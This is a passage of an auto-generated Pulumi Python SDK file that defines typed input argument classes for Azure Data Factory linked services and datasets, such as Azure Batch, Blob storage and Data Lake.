pulumi.set(__self__, "access_key_id", access_key_id)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if secret_access_key is not None:
pulumi.set(__self__, "secret_access_key", secret_access_key)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessKeyId")
def access_key_id(self) -> Optional[Any]:
"""
The access key identifier of the Amazon S3 Identity and Access Management (IAM) user. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "access_key_id")
@access_key_id.setter
def access_key_id(self, value: Optional[Any]):
pulumi.set(self, "access_key_id", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="secretAccessKey")
def secret_access_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The secret access key of the Amazon S3 Identity and Access Management (IAM) user.
"""
return pulumi.get(self, "secret_access_key")
@secret_access_key.setter
def secret_access_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "secret_access_key", value)
@pulumi.input_type
class AvroFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in Avro format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'AvroFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class AzureBatchLinkedServiceArgs:
def __init__(__self__, *,
account_name: Any,
batch_uri: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
pool_name: Any,
type: pulumi.Input[str],
access_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure Batch linked service.
:param Any account_name: The Azure Batch account name. Type: string (or Expression with resultType string).
:param Any batch_uri: The Azure Batch URI. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: The Azure Storage linked service reference.
:param Any pool_name: The Azure Batch pool name. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_key: The Azure Batch account access key.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "batch_uri", batch_uri)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "pool_name", pool_name)
pulumi.set(__self__, "type", 'AzureBatch')
if access_key is not None:
pulumi.set(__self__, "access_key", access_key)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Any:
"""
The Azure Batch account name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Any):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="batchUri")
def batch_uri(self) -> Any:
"""
The Azure Batch URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "batch_uri")
@batch_uri.setter
def batch_uri(self, value: Any):
pulumi.set(self, "batch_uri", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
The Azure Storage linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="poolName")
def pool_name(self) -> Any:
"""
The Azure Batch pool name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "pool_name")
@pool_name.setter
def pool_name(self, value: Any):
pulumi.set(self, "pool_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessKey")
def access_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The Azure Batch account access key.
"""
return pulumi.get(self, "access_key")
@access_key.setter
def access_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_key", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureBlobDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
file_name: Optional[Any] = None,
folder_path: Optional[Any] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_root_location: Optional[Any] = None):
"""
The Azure Blob storage.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the blob storage.
:param pulumi.Input[str] description: Dataset description.
:param Any file_name: The name of the Azure Blob. Type: string (or Expression with resultType string).
:param Any folder_path: The path of the Azure Blob storage. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of the Azure Blob storage.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_root_location: The root of blob path. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureBlob')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if folder_path is not None:
pulumi.set(__self__, "folder_path", folder_path)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_root_location is not None:
pulumi.set(__self__, "table_root_location", table_root_location)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the blob storage.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[Any]:
"""
The name of the Azure Blob. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_name")
@file_name.setter
def file_name(self, value: Optional[Any]):
pulumi.set(self, "file_name", value)
@property
@pulumi.getter(name="folderPath")
def folder_path(self) -> Optional[Any]:
"""
The path of the Azure Blob storage. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "folder_path")
@folder_path.setter
def folder_path(self, value: Optional[Any]):
pulumi.set(self, "folder_path", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of the Azure Blob storage.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableRootLocation")
def table_root_location(self) -> Optional[Any]:
"""
The root of blob path. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_root_location")
@table_root_location.setter
def table_root_location(self, value: Optional[Any]):
pulumi.set(self, "table_root_location", value)
@pulumi.input_type
class AzureDataLakeAnalyticsLinkedServiceArgs:
def __init__(__self__, *,
account_name: Any,
tenant: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
data_lake_analytics_uri: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
resource_group_name: Optional[Any] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
subscription_id: Optional[Any] = None):
"""
Azure Data Lake Analytics linked service.
:param Any account_name: The Azure Data Lake Analytics account name. Type: string (or Expression with resultType string).
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any data_lake_analytics_uri: Azure Data Lake Analytics URI Type: string (or Expression with resultType string).
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any resource_group_name: Data Lake Analytics account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
:param Any service_principal_id: The ID of the application used to authenticate against the Azure Data Lake Analytics account. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The Key of the application used to authenticate against the Azure Data Lake Analytics account.
:param Any subscription_id: Data Lake Analytics account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "tenant", tenant)
pulumi.set(__self__, "type", 'AzureDataLakeAnalytics')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if data_lake_analytics_uri is not None:
pulumi.set(__self__, "data_lake_analytics_uri", data_lake_analytics_uri)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if subscription_id is not None:
pulumi.set(__self__, "subscription_id", subscription_id)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Any:
"""
The Azure Data Lake Analytics account name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Any):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def tenant(self) -> Any:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Any):
pulumi.set(self, "tenant", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="dataLakeAnalyticsUri")
def data_lake_analytics_uri(self) -> Optional[Any]:
"""
Azure Data Lake Analytics URI Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "data_lake_analytics_uri")
@data_lake_analytics_uri.setter
def data_lake_analytics_uri(self, value: Optional[Any]):
pulumi.set(self, "data_lake_analytics_uri", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[Any]:
"""
Data Lake Analytics account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[Any]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the application used to authenticate against the Azure Data Lake Analytics account. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The Key of the application used to authenticate against the Azure Data Lake Analytics account.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> Optional[Any]:
"""
Data Lake Analytics account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: Optional[Any]):
pulumi.set(self, "subscription_id", value)
@pulumi.input_type
class AzureDataLakeStoreDatasetArgs:
def __init__(__self__, *,
folder_path: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
file_name: Optional[Any] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Azure Data Lake Store dataset.
:param Any folder_path: Path to the folder in the Azure Data Lake Store. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the item(s) in the Azure Data Lake Store.
:param pulumi.Input[str] description: Dataset description.
:param Any file_name: The name of the file in the Azure Data Lake Store. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of the Data Lake Store.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "folder_path", folder_path)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureDataLakeStoreFile')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="folderPath")
def folder_path(self) -> Any:
"""
Path to the folder in the Azure Data Lake Store. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "folder_path")
@folder_path.setter
def folder_path(self, value: Any):
pulumi.set(self, "folder_path", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the item(s) in the Azure Data Lake Store.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[Any]:
"""
The name of the file in the Azure Data Lake Store. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_name")
@file_name.setter
def file_name(self, value: Optional[Any]):
pulumi.set(self, "file_name", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of the Data Lake Store.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureDataLakeStoreLinkedServiceArgs:
def __init__(__self__, *,
data_lake_store_uri: Any,
type: pulumi.Input[str],
account_name: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
resource_group_name: Optional[Any] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
subscription_id: Optional[Any] = None,
tenant: Optional[Any] = None):
"""
Azure Data Lake Store linked service.
:param Any data_lake_store_uri: Data Lake Store service URI. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any account_name: Data Lake Store account name. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any resource_group_name: Data Lake Store account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
:param Any service_principal_id: The ID of the application used to authenticate against the Azure Data Lake Store account. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The Key of the application used to authenticate against the Azure Data Lake Store account.
